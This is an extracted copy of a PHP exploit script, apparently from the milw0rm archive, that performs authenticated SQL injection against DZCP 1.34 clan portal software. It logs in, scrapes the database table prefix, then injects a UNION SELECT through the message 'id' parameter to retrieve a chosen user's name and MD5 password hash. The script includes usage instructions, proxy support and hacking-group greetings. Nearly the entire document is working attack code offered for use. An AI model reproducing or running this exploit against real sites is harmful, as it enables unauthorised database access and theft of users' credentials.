Loading ...
Global Do...
News & Politics
8
0
Try Now
Log In
Pricing
1 <? 2 error_reporting(E_ERROR); 3 4 function exploit_init() 5 { 6 if (!extension_loaded(’php_curl’) && !extension_loaded(’curl’)) 7 { 8 if (!dl(’curl.so’) && !dl(’php_curl.dll’)) 9 die ("oo error − cannot load curl extension!"); 10 } 11 } 12 13 function exploit_header() 14 { 15 echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo"; 16 echo " oo ooooooo ooooooo\n"; 17 echo " oooo oooo o888 o88 888 o888 888o\n"; 18 echo " 888o888 888 o888 888888888\n"; 19 echo " o88888o 888 o888 o 888o o888\n"; 20 echo " o88o o88o o888o o8888oooo88 88ooo88\n"; 21 echo "oooooooooooooooooooooooo dzcp 1.34 remote sql injection oooooooooooooooooooooooo\n"; 22 echo "oo usage $ php dzcp−134−exploit.php [url] [user] [pwd] [id]\n"; 23 echo "oo proxy support $ php dzcp−134−exploit.php [url] [user] [pwd] [id]\n"; 24 echo " [proxy]:[port]\n"; 25 echo "oo example $ php dzcp−134−exploit.php http://localhost x128 pwd 1\n"; 26 echo "oo you need an account on the system\n"; 27 echo "oo print the password of the user\n\n"; 28 } 29 30 function exploit_bottom() 31 { 32 echo "\noo greets : tlm65 − i want to wish you a happy 23st birthday! thank you for\n"; 33 echo " the last two years. we never become the fastest hacking group on\n"; 34 echo " net without you.\n"; 35 echo "oo discover : x128 − alexander wilhelm − 30/06/2006\n"; 36 echo "oo contact : exploit <at> x128.net oo website : www.x128.net\n"; 37 } 38 39 function exploit_execute() 40 { 41 $connection = curl_init(); 42 43 if ($_SERVER[’argv’][5]) 44 { 45 curl_setopt($connection, CURLOPT_TIMEOUT, 8); 46 curl_setopt($connection, CURLOPT_PROXY, $_SERVER[’argv’][5]); 47 } 48 curl_setopt ($connection, CURLOPT_USERAGENT, ’x128’); 49 curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); 50 curl_setopt ($connection, CURLOPT_HEADER, 0); 51 curl_setopt ($connection, CURLOPT_POST, 1); 52 curl_setopt ($connection, CURLOPT_COOKIE, 1); Page 1/2 deVLz Clanportal DZCP 1.34 id Remote SQL Injection Exploit x128 07/01/2006 53 curl_setopt ($connection, CURLOPT_COOKIEJAR, ’exp−cookie.txt’); 54 curl_setopt ($connection, CURLOPT_COOKIEFILE, ’exp−cookie.txt’); 55 curl_setopt ($connection, CURLOPT_URL, $_SERVER[’argv’][1] . "/user/index.php?action=login&do=yes"); 56 curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER[’argv’][2] . "&pwd=" . $_SERVER[’argv’][3] . "&perm anent=1"); 57 58 $source = curl_exec($connection) or die("oo error − cannot connect!\n"); 59 60 curl_setopt ($connection, CURLOPT_POST, 0); 61 curl_setopt ($connection, CURLOPT_URL, $_SERVER[’argv’][1] . "/user/index.php?action=msg&do=answer&id=x128"); 62 $source = curl_exec($connection) or die("oo error − cannot connect!\n"); 63 64 preg_match("/FROM ([0−9a−zA−Z_]*)messages/", $source, $prefix); 65 66 curl_setopt ($connection, CURLOPT_URL, $_SERVER[’argv’][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("−1 UNIO N SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER[’argv’][4])); 67 $source = curl_exec($connection) or die("oo error − cannot connect!\n"); 68 69 preg_match("/>([0−9a−f]{32})</", $source, $password); 70 preg_match("/RE: (.*)\" class/", $source, $user); 71 72 if ($password[1]) 73 { 74 echo "oo user " . $user[1] . "\n"; 75 echo "oo password " . $password[1] . "\n\n"; 76 echo "oo dafaced ...\n"; 77 } 78 79 curl_close ($connection); 80 } 81 82 exploit_init(); 83 exploit_header(); 84 exploit_execute(); 85 exploit_bottom(); 86 ?> 87 88 # milw0rm.com [2006−07−01] Page 2/2 deVLz Clanportal DZCP 1.34 id Remote SQL Injection Exploit x128 07/01/2006